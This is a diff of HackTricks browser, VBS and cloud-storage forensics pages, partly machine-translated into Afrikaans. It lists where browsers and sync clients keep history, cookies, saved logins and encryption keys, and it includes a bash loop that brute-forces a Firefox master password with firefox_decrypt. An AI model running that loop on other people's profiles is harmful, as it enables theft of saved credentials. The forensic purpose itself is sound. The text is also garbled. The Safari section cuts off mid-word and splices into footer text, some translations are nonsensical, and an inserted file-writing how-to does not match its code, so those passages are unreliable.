lêers vind: -- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data. - - Use specific SQL queries to extract history and downloads information. -- **bookmarkbackups**: Contains backups of bookmarks. -- **formhistory.sqlite**: Stores web form data. -- **handlers.json**: Manages protocol handlers. -- **persdict.dat**: Custom dictionary words. -- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions. -- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows. -- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). -- **favicons.sqlite**: Stores favicons. -- **prefs.js**: User settings and preferences. -- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite. -- **thumbnails**: Website thumbnails. -- **logins.json**: Encrypted login information. -- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information. +- **places.sqlite**: Stoor geskiedenis, bladmerke en aflaaie. Gereedskap soos [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) op Windows kan toegang verkry tot die geskiedenisdata. +- Gebruik spesifieke SQL-navrae om geskiedenis- en aflaaie-inligting te onttrek. +- **bookmarkbackups**: Bevat rugsteun van bladmerke. +- **formhistory.sqlite**: Stoor webvormdata. +- **handlers.json**: Bestuur protokolhanteraars. +- **persdict.dat**: Aangepaste woordeboekwoorde. +- **addons.json** en **extensions.sqlite**: Inligting oor geïnstalleerde byvoegings en uitbreidings. +- **cookies.sqlite**: Koekie-opberging, met [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) beskikbaar vir inspeksie op Windows. +- **cache2/entries** of **startupCache**: Kasdata, toeganklik deur gereedskap soos [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). +- **favicons.sqlite**: Stoor favicons. +- **prefs.js**: Gebruikersinstellings en voorkeure. +- **downloads.sqlite**: Ouer aflaaie-databasis, nou geïntegreer in places.sqlite. +- **thumbnails**: Webwerf-duimnaels. +- **logins.json**: Versleutelde aanmeldingsinligting. +- **key4.db** of **key3.db**: Stoor versleutelingssleutels vir die beveiliging van sensitiewe inligting. -Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled. +Daarbenewens kan die blaaier se anti-phishing-instellings nagegaan word deur te soek na `browser.safebrowsing`-inskrywings in `prefs.js`, wat aandui of veilige blaaierfunksies geaktiveer of gedeaktiveer is. -To try to decrypt the master password, you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\ -With the following script and call you can specify a password file to brute force: +Om te probeer om die meesterwagwoord te ontsluit, kan jy [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt) gebruik.\ +Met die volgende skripsie en oproep kan jy 'n wagwoordlêer spesifiseer om kragtig te krag: {% code title="brute.sh" %} ```bash @@ -83,8 +83,8 @@ With the following script and call you can specify a password file to brute forc #./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:" passfile=$1 while read pass; do - echo "Trying $pass" - echo "$pass" | python firefox_decrypt.py +echo "Trying $pass" +echo "$pass" | python firefox_decrypt.py done < $passfile ``` {% endcode %} @@ -93,113 +93,76 @@ done < $passfile ## Google Chrome -Google Chrome stores user profiles in specific locations based on the operating system: +Google Chrome stoor gebruikersprofielle in spesifieke liggings gebaseer op die bedryfstelsel: - **Linux**: `~/.config/google-chrome/` - **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\` - **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/` -Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data: +Binne hierdie gids, kan die meeste gebruikersdata gevind word in die **Default/** of **ChromeDefaultData/** gids. Die volgende lêers bevat belangrike data: -- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads. -- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available. -- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). -- **Bookmarks**: User bookmarks. -- **Web Data**: Contains form history. -- **Favicons**: Stores website favicons. -- **Login Data**: Includes login credentials like usernames and passwords. -- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs. -- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed. -- **Extensions**: Directories for browser extensions and addons. -- **Thumbnails**: Stores website thumbnails. -- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more. -- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output. +- **Geskiedenis**: Bevat URL's, aflaaiers, en soek sleutelwoorde. Op Windows, kan [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) gebruik word om die geskiedenis te lees. Die "Transition Type" kolom het verskillende betekenisse, insluitend gebruiker klieke op skakels, getikte URL's, vorm indienings, en bladsy herlaaiings. +- **Koekies**: Stoor koekies. Vir inspeksie, is [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) beskikbaar. +- **Cache**: Hou gekasde data. Om te inspekteer, kan Windows gebruikers [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) gebruik. +- **Bladmerke**: Gebruiker bladmerke. +- **Web Data**: Bevat vorm geskiedenis. +- **Favicons**: Stoor webwerf favicons. +- **Login Data**: Sluit aanmeldingslegitimasie soos gebruikersname en wagwoorde in. +- **Huidige Sessie**/**Huidige Vlakke**: Data oor die huidige blaaier sessie en oop vlakke. +- **Laaste Sessie**/**Laaste Vlakke**: Inligting oor die webwerwe aktief gedurende die laaste sessie voor Chrome gesluit is. +- **Uitbreidings**: Gids vir blaaier uitbreidings en addons. +- **Duimnaels**: Stoor webwerf duimnaels. +- **Voorkeure**: 'n Lêer ryk aan inligting, insluitend instellings vir plugins, uitbreidings, pop-ups, kennisgewings, en meer. +- **Blaaier se ingeboude anti-phishing**: Om te kyk of anti-phishing en malware beskerming geaktiveer is, voer `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` uit. Kyk vir `{"enabled: true,"}` in die uitset. -## **SQLite DB Data Recovery** +## **SQLite DB Data Herwinning** -As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). +Soos waargeneem kan word in die vorige afdelings, gebruik beide Chrome en Firefox **SQLite** databasisse om die data te stoor. Dit is moontlik om **verwyderde inskrywings te herwin met behulp van die instrumente** [**sqlparse**](https://github.com/padfoot999/sqlparse) **of** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). ## **Internet Explorer 11** -Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management. +Internet Explorer 11 bestuur sy data en metadata oor verskillende liggings, wat help om gestoorde inligting en die ooreenstemmende besonderhede te skei vir maklike toegang en bestuur. -### Metadata Storage -Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype. +### Metadata Berging +Metadata vir Internet Explorer word gestoor in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (met VX wat V01, V16, of V24 kan wees). Tesame hiermee, kan die `V01.log` lêer wysigingstyd afwykings met `WebcacheVX.data` toon, wat dui op 'n behoefte vir herstel met behulp van `esentutl /r V01 /d`. Hierdie metadata, wat in 'n ESE databasis gehuisves word, kan herwin en ondersoek word met behulp van instrumente soos photorec en [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) onderskeidelik. Binne die **Containers** tabel, kan 'n mens die spesifieke tabelle of houers waar elke data segment gestoor word, onderskei, insluitend cache besonderhede vir ander Microsoft gereedskap soos Skype. -### Cache Inspection -The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times. +### Cache Inspeksie +Die [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) instrument maak dit moontlik om die cache te inspekteer, met die vereiste van die cache data onttrekkingsgids. Metadata vir die cache sluit lêernaam, gids, toegangstellings, URL oorsprong, en tydstempels wat cache skepping, toegang, wysiging, en verval tyd aandui. -### Cookies Management -Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory. +### Koekies Bestuur +Koekies kan ondersoek word met behulp van [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), met metadata wat name, URL's, toegangstellings, en verskeie tydverwante besonderhede insluit. Volgehoue koekies word gestoor in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, met sessie koekies wat in die geheue bly. -### Download Details -Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. +### Aflaaibesonderhede +Aflaaibesonderhede is toeganklik via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), met spesifieke houers wat data soos URL, lêertipe, en aflaaigids bevat. Fisiese lêers kan gevind word onder `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. -### Browsing History -To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`. +### Blaai Geskiedenis +Om blaai geskiedenis te hersien, kan [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) gebruik word, met die vereiste van die ligging van die uitgepakte geskiedenis lêers en konfigurasie vir Internet Explorer. Metadata hier sluit wysiging en toegangstye in, tesame met toegangstellings. Geskiedenis lêers is geleë in `%userprofile%\Appdata\Local\Microsoft\Windows\History`. -### Typed URLs -Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times. +### Getikte URL's +Getikte URL's en hul gebruikstye word binne die register gestoor onder `NTUSER.DAT` by `Software\Microsoft\InternetExplorer\TypedURLs` en `Software\Microsoft\InternetExplorer\TypedURLsTime`, wat die laaste 50 URL's wat deur die gebruiker ingevoer is en hul laaste inset tye volg. ## Microsoft Edge -Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are: +Microsoft Edge stoor gebruikersdata in `%userprofile%\Appdata\Local\Packages`. Die paaie vir verskillende datatipes is: -- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC` -- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat` -- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb` +- **Profiel Pad**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC` +- **Geskiedenis, Koekies, en Aflaaibestande**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat` +- **Instellings, Bladmerke, en Leeslys**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb` - **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache` -- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active` +- **Laaste Aktiewe Sessies**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active` ## Safari -Safari data is stored at `/Users/$User/Library/Safari`. Key files include: +Safari data word gestoor by `/Users/$User/Library/Safari`. Sleutellêers sluit in: -- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query. -- **Downloads.plist**: Information about downloaded files. -- **Bookmarks.plist**: Stores bookmarked URLs. -- **TopSites.plist**: Most frequently visited sites. -- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve. -- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse. -- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse. -- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active. - -## Opera - -Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads. - -- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`. - -These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers. - - -## References -* [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a) -* [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/) -* [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) -* **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** - - -
- -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +- **History.db**: Bevat `history_visits` en `history_items` tabelle met URL's en besoek tydstempels. Gebruik `sqlite3` om navrae te doen. +- **Downloads.plist**: Inligting oor afgelaai lêers. +- **Bookmarks.plist**: Stoor gebl +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index e1fb4471c..25fa36822 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,81 +1,87 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Some things that could be useful to debug/deobfuscate a malicious VBS file: +Sommige dinge wat nuttig kan wees om 'n skadelike VBS-lêer te ontleed/deobfuskasie: ## echo - ```bash Wscript.Echo "Like this?" ``` - -## Commnets - +## Kommentaar ```bash ' this is a comment ``` - -## Test - +## Toets ```bash cscript.exe file.vbs ``` +## Skryf data na 'n lêer -## Write data to a file +Om data na 'n lêer te skryf, kan jy die volgende stappe volg: +1. Maak 'n nuwe lêer aan deur die lêer te skep met die gewenste naam en lêeruitbreiding. Byvoorbeeld, as jy 'n lêer met die naam "data.txt" wil skep, kan jy die volgende opdrag gebruik: + + ```bash + echo > data.txt + ``` + +2. Open die lêer in 'n teksredigeerder of skryfprogram. Jy kan 'n teksredigeerder soos Notepad++ of Vim gebruik. + +3. Skryf die data wat jy wil stoor in die lêer. Jy kan enige teks of binêre data in die lêer skryf. Byvoorbeeld: + + ```bash + echo "Dit is 'n voorbeeld van data wat in die lêer geskryf word." > data.txt + ``` + +4. Stoor die veranderinge en sluit die lêer. + +Nou sal die spesifiseerde data in die lêer gestoor word. ```js Function writeBinary(strBinary, strPath) - Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") +Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") - ' below lines purpose: checks that write access is possible! - Dim oTxtStream +' below lines purpose: checks that write access is possible! +Dim oTxtStream - On Error Resume Next - Set oTxtStream = oFSO.createTextFile(strPath) +On Error Resume Next +Set oTxtStream = oFSO.createTextFile(strPath) - If Err.number <> 0 Then MsgBox(Err.message) : Exit Function - On Error GoTo 0 +If Err.number <> 0 Then MsgBox(Err.message) : Exit Function +On Error GoTo 0 - Set oTxtStream = Nothing - ' end check of write access +Set oTxtStream = Nothing +' end check of write access - With oFSO.createTextFile(strPath) - .Write(strBinary) - .Close - End With +With oFSO.createTextFile(strPath) +.Write(strBinary) +.Close +End With End Function ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index 4359365c5..756c77de3 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -1,138 +1,136 @@ -# Local Cloud Storage +# Plaaslike Wolklêerstoor
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## OneDrive -In Windows, you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files: +In Windows kan jy die OneDrive-vouer vind in `\Users\\AppData\Local\Microsoft\OneDrive`. En binne `logs\Personal` is dit moontlik om die lêer `SyncDiagnostics.log` te vind wat interessante data bevat oor die gesinkroniseerde lêers: -* Size in bytes -* Creation date -* Modification date -* Number of files in the cloud -* Number of files in the folder -* **CID**: Unique ID of the OneDrive user -* Report generation time -* Size of the HD of the OS +* Grootte in bytes +* Skeppingsdatum +* Wysigingsdatum +* Aantal lêers in die wolk +* Aantal lêers in die vouer +* **CID**: Unieke ID van die OneDrive-gebruiker +* Verslaggenereringstyd +* Grootte van die bedryfstelsel se harde skyf -Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files synchronized with OneDrive. +Nadat jy die CID gevind het, word dit aanbeveel om **lêers te soek wat hierdie ID bevat**. Jy kan lêers met die naam vind: _**\.ini**_ en _**\.dat**_ wat interessante inligting kan bevat, soos die name van lêers wat met OneDrive gesinkroniseer is. ## Google Drive -In Windows, you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\ -This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5. +In Windows kan jy die hoof Google Drive-vouer vind in `\Users\\AppData\Local\Google\Drive\user_default`\ +Hierdie vouer bevat 'n lêer genaamd Sync\_log.log met inligting soos die e-posadres van die rekening, lêernaam, tydstempels, MD5-hashes van die lêers, ens. Selfs uitgevee lêers verskyn in daardie loglêer met die ooreenstemmende MD5. -The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files. +Die lêer **`Cloud_graph\Cloud_graph.db`** is 'n sqlite-databasis wat die tabel **`cloud_graph_entry`** bevat. In hierdie tabel kan jy die **naam** van die **gesinkroniseerde** **lêers**, gewysigde tyd, grootte en die MD5-kontrolegetal van die lêers vind. -The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version. +Die tabeldata van die databasis **`Sync_config.db`** bevat die e-posadres van die rekening, die pad van die gedeelde vouers en die Google Drive-weergawe. ## Dropbox -Dropbox uses **SQLite databases** to manage the files. In this\ -You can find the databases in the folders: +Dropbox gebruik **SQLite-databasisse** om die lêers te bestuur. In hierdie\ +Jy kan die databasisse in die volgende vouers vind: -* `\Users\\AppData\Local\Dropbox` -* `\Users\\AppData\Local\Dropbox\Instance1` -* `\Users\\AppData\Roaming\Dropbox` +* `\Users\\AppData\Local\Dropbox` +* `\Users\\AppData\Local\Dropbox\Instance1` +* `\Users\\AppData\Roaming\Dropbox` -And the main databases are: +En die belangrikste databasisse is: * Sigstore.dbx * Filecache.dbx * Deleted.dbx * Config.dbx -The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN)) +Die ".dbx"-uitbreiding beteken dat die **databasisse** **gekripteer** is. Dropbox gebruik **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN)) -To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). +Om die kriptering wat Dropbox gebruik beter te verstaan, kan jy lees [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). -However, the main information is: +Die belangrikste inligting is egter: -* **Entropy**: d114a55212655f74bd772e37e64aee9b -* **Salt**: 